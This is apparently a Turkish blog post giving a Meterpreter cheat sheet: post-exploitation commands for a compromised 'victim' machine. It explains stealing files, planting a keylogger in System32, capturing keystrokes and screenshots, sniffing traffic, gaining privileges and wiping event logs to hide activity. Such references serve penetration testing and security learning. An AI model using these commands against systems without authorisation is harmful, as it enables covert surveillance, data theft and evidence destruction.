TR | Meterpreter Cheat Sheet

Meterpreter Nedir ?
Meterpreter metasploit ile exploit ettiğiniz bir açık ile terminal’e ulaştığınızda size bir terminal ekranı verir.( SSH’a benzetebilirsiniz. ) Bu meterpreter terminali ile bir çok işlem yapabilirsiniz.Aşağıda görüceğiniz gibi kurbanın sisteminde ( victim ) keylogger başlatabilirsiniz veya özel izinlere sahip kullanıcılar oluşturabilirsiniz.Meterpreter ile yapabiliceklerinizin bir sınırı yok gibi birşeydir.Linux bash terminale benzer ( komutlar vs. ).

Not:Aşağıda ki komutlarda sadece belli başlı komutlara örnek verildi.Genel işleyiş yine aynı şekildedir.

Meterpreter Komutları :
Meterpreter’i kullanmak basittir.Aynı linux terminaline benzetebilirsiniz.Tek farkla bu terminal kurban kişide çalışmaktadır ve tabi ki bunu göremez.
Meterpreterde kullanılan komutların çoğu bash komutlarına benzer.Yine’de şöyle bir göz gezdirelim.
Meterpreter de kullanılan komutlar:
? – Yardım menüsü zaten buradan okuyarak da ilerleyebilirsiniz.
bgkill = Arkaplanda ki meterpreter komutlarını sonlandırır.
bglist = Arkaplanda çalışan meterpreter komutlarını listeler.
bgrun = Arkaplanda komut çalıştırmanızı sağlar.
channel = Aktif olarak bağlandığınız kanalları gösterir.
close = Kanalları kapatır.
exit & quit = Meterpreter sesssionı sonlandırır.
interact = kanallar ile etkileşime girer.
irb = Ruby script modunu açar.
read = Kanallarda ki dataları okur
run = Yazdığınız bir meterpreter scriptini çalıştırır.
use = Meterpreter eklentilerini load eder ( yükler )
write = Kanallara data yazar.
cat = Bash’de ki kullanımıyla aynıdır.Dosyayı okur ve ekrana basar.
cd = Bulunduğunuz konumu değiştirir. C:/windows C:/ vb.
del = Kurbanın dosya sisteminden dosya siler.
download = Kurbanın sisteminden kendi sisteminize dosya indirir.

download c:\\hesaplar.txt
### Burda çift slash kullanmamızın nedeni windows sistemlerde aslında bu şekilde olmasından kaynaklıdır.

edit = dosya editlemenize yarar. ( Vim’i açar )

edit editabletext.txt 

getlwd = Sistemin ana klasörünü gösterir. C:/Windows veya Linux / dizini gibi.
getwd = Şuan bulunduğunuz konumu,klasörü gösterir.
lcd = Sistemin ana klasörünü değiştirmenizi sağlar.
ls = Bulunduğunuz klasörün içinde ki dosyaları ve klasörleri görüntüler.
rm = Dosya silme işlemi yapar.

rm editable.txt 

rmdir = Klasör silme işlemi yapar

rmdir Windows// 

upload = Kurbana bir dosya göndermenize yarar.

 upload keyloggerimiz.exe C://Windows//System32 

ipconfig = Ağ aygıtlarını ve bununla birlikte IP vs. gösterir.
portfwd = Kurban dan port yönlendirmesi yapabilirsiniz.
route = Kurbanın yönlendirme tablosunu değiştirebilir ve görüntüleyebilirsiniz.
clearev = Kurbanın sistem günlüklerini temizlersiniz.

[*] Wiping 33 records from Application...
[*] Wiping 555 records from System...
[*] Wiping 38 records from Security...

execute = Komut çalıştırmak için kullanılır.
ps = Çalışan prosessleri görüntüleyebilirsiniz.
kill = Prosess id ile çalışan uygulamaları kapatabilirsiniz.
reboot = Kurbanın sistemine restart atar.
rev2self = Kurbanın sisteminde RevertToSelf()’i çalıştırır.
shell = Kurbanın bilgisayarında terminali açarsınız.
shutdown = Kurbanın sistemini kapatırsınız.
sysinfo = Kurbanın sistemi hakkında detaylı bilgi alırsınız.
enumdesktops = Ulaşılabilir tüm masaüstlerini görüntüler.
getdesktop = Kullandığınız meterpreter’de ki mevcut masaüstünü getirir. ( O an hangi kurban ile uğraşıyorsanız. )
screenshot = Kurbanın ekran görüntüsünü alırsınız.
uictl = Bazı kullanıcı arayüzü eklentilerini aktif hale getirirsiniz.( RDP vs)
keyscan_start = Uzakta ki hedefin,kurbanın tuşa bastıklarını kaydetmek için başlatılır.Keylogger gibi.
keyscan_dump = Uzakta ki hedefin,kurbanın tuş dökümlerini almanızı sağlar.
keyscan_stop = Keyscan modülünü deaktif eder.
getprivs = Kurbanın sisteminde bazı özel ayrıcalıkları alırsınız.
use sniffer = Sniffer modülünü load eder.
sniffer_interfaces = Kurbanın sisteminde ki uygun( sniff edilebilicek ) arayüzleri gösterir.
sniffer_dump arayüzID pcapname = Uzak hedefi sniff etme işlemini başlatır.
sniffer_start arayüzID packet-buffer = Sniffer’ı başlatır fakat sizin istediğiniz özel buffer aralıklarında.
sniffer_stats arayüzID = Sniff edilen ağa ait istatiksel bilgileri gösterir.
sniffer_stop arayüzID = Belli bir arayüzde başlatılan sniffer’ı durdurur.